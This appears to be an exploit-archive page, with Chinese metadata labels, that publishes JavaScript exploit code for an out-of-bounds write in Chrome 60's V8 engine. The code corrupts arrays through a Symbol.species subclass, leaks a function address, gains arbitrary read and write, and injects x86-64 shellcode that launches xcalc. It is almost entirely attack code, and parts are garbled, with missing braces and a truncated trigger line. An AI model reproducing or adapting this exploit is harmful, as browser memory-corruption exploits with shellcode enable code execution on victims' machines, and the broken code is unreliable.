Google Chrome 60.0.3080.5 V8 JavaScript Engine – Out-of-Bounds Write

  • 作者: halbecaf
    日期: 2017-05-26
  • 类别:
  • 来源:
  • // Source:
    // v8 exploit for
    var oob_rw = null;
    var leak = null;
    var arb_rw = null;
    var code = function() {
    return 1;
    class BuggyArray extends Array {
    constructor(len) {
    oob_rw = new Array(1.1, 1.1);
    leak = new Array(code);
    arb_rw = new ArrayBuffer(4);
    class MyArray extends Array {
    static get [Symbol.species]() {
    return BuggyArray;
    var convert_buf = new ArrayBuffer(8);
    var float64 = new Float64Array(convert_buf);
    var uint8 = new Uint8Array(convert_buf);
    var uint32 = new Uint32Array(convert_buf);
    function Uint64Add(dbl, to_add_int) {
    float64[0] = dbl;
    var lower_add = uint32[0] + to_add_int;
    if (lower_add > 0xffffffff) {
    lower_add &= 0xffffffff;
    uint32[1] += 1;
    uint32[0] = lower_add;
    return float64[0];
    // Memory layout looks like this:
    // ================================================================================
    // |a_ BuggyArray (0x80) | a_ FixedArray (0x18) | oob_rw JSArray (0x30) |
    // --------------------------------------------------------------------------------
    // |oob_rw FixedDoubleArray (0x20) | leak JSArray (0x30) | leak FixedArray (0x18) |
    // --------------------------------------------------------------------------------
    // |arb_rw ArrayBuffer |
    // ================================================================================
    var myarray = new MyArray();
    myarray.length = 9;
    myarray[4] = 42;
    myarray[8] = 42; { return 1000000; });
    var js_function_addr = oob_rw[10];// JSFunction for code()
    // Set arb_rw's kByteLengthOffset to something big.
    uint32[0] = 0;
    uint32[1] = 1000000;
    oob_rw[14] = float64[0];
    // Set arb_rw's kBackingStoreOffset to
    // js_function_addr + JSFunction::kCodeEntryOffset - 1
    // (to get rid of Object tag)
    oob_rw[15] = Uint64Add(js_function_addr, 56-1);
    var js_function_uint32 = new Uint32Array(arb_rw);
    uint32[0] = js_function_uint32[0];
    uint32[1] = js_function_uint32[1];
    oob_rw[15] = Uint64Add(float64[0], 128); // 128 = code header size
    // pop /usr/bin/xcalc
    var shellcode = new Uint32Array(arb_rw);
    shellcode[0] = 0x90909090;
    shellcode[1] = 0x90909090;
    shellcode[2] = 0x782fb848;
    shellcode[3] = 0x636c6163;
    shellcode[4] = 0x48500000;
    shellcode[5] = 0x73752fb8;
    shellcode[6] = 0x69622f72;
    shellcode[7] = 0x8948506e;
    shellcode[8] = 0xc03148e7;
    shellcode[9] = 0x89485750;
    shellcode[10] = 0xd23148e6;
    shellcode[11] = 0x3ac0c748;
    shellcode[12] = 0x50000030;
    shellcode[13] = 0x4944b848;
    shellcode[14] = 0x414c5053;
    shellcode[15] = 0x48503d59;
    shellcode[16] = 0x3148e289;
    shellcode[17] = 0x485250c0;
    shellcode[18] = 0xc748e289;
    shellcode[19] = 0x00003bc0;
    shellcode[20] = 0x050f00;